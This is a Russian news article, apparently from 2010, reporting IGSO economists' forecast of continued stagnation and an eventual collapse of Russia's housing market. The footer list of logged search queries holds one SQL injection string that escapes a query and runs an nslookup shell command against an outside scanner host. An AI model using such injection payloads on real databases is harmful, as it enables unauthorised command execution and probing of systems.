Последние новости
Новости образования /

В падение грозит перейти застой на жилищном рынке

В ближайшие полгода российский жилищный рынок останется в застойном состоянии. Прежнее слабое восстановление прекратится. Цены, вероятно, вновь незначительно снизятся. К такому заключению пришли специалисты Центра экономических исследований Института глобализации и социальных движений (ИГСО). В дальнейшем под влиянием внешних и внутренних причин можно ожидать крах рынка и разорения ряда строительные монополии. Они, вероятно, будут поглощены промышленными корпорациями и государством. Крах рынка снимет с экономики России тяжелое бремя, но ожидать его стоит не ранее весны-лета 2011 года. Текущее положение на рынке жилья противоречит общеэкономическим процессам и поддерживается искусственно.

В 2009 году правительство из опасений вызвать лавинообразное банкротство банков предотвратило крах рынка недвижимости. Наступившая вскоре мировая стабилизация позволила рассчитывать на скорее возвращение экономики к докризисному виду. «В результате ситуация была заморожена: цены остались чрезмерно высокими, а продажи чрезвычайно низкими. Удушающее воздействие на российскую экономику дорогой недвижимости целиком сохранилось», - отмечает Борис Кагарлицкий, Директор ИГСО. По его словам, высокая стоимость жилья ограничивает возможности потребителей, не менее, чем дорогая ипотека. Строительная сфера остается наиболее паразитической в национальном хозяйстве РФ. Это мешает промышленному развитию страны. При этом финансовое положение строительных компаний и связанных с ними структур остается тяжелым и принципиально не улучшилось за 2009-2010 годы. Нарушение макроэкономического равновесия легко может сделать их неплатежеспособными.

После пережитой в 2009 ― первой половине 2010 годов «посткризисной» эйфории в российской экономике вновь складывается сложная ситуация. На рынке труда возрастает напряженность. Потребительский спрос снижается. «Хотя сырье и ценные бумаги вернулись на планете к ценовым показателям до весеннего обвала рынков, это не обещает ничего хорошего. Стабильность мировой экономики крайне шатка. Новое снижение мировых цен на сырье способно резко обострить ситуацию в российской экономике и вызвать отложенный крах рынка недвижимости», - полагает Василий Колташов, руководитель Центра экономических исследований ИГСО. По его оценке, правительству может не хватить ресурсов для полной остановки падения. Власти будут спасать отдельные банки и строительные компании. Остальным для получения наличности придется пойти на распродажу скопившихся объектов. Медленное снижение цен может возобновиться уже зимой. Но радикальные перемены ждут рынок позднее.

За первую половину 2010 года цены на жилье в России выросли более чем на 1%. В этот период отмечалось легкое оживление рынка. Наблюдатели констатировали рост сделок. Продавцы стали менее охотно, чем в 2009 году идти на скидки. Но общее состояние жилищного рынка осталось угнетенным. Повышение стоимости отечественной недвижимости шло вопреки мировой тенденции ― росту предложения и сокращению спроса. Приход осени не оправдал оптимистических прогнозов: в середине октября рост цен остановился. Вопреки высоким нефтяным ценам в отечественной сфере продаж жилья начали проявляться последствия летней засухи. Снижение розничных продаж создало условия для ухудшения климата во всех областях экономики связанных с внутренним рынком России. Естественно, что жилье ― самый дорогой «потребительский товар» в числе первых должен был ощутить начавшиеся перемены.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-1640.1964.babb1.1.bxss.me
  • testing
  • почему застой на рынке жилья
  • крах рынка недвижимости россии 2012
  • обвал рынка недвижимости в россии
имя


Популярые сообщения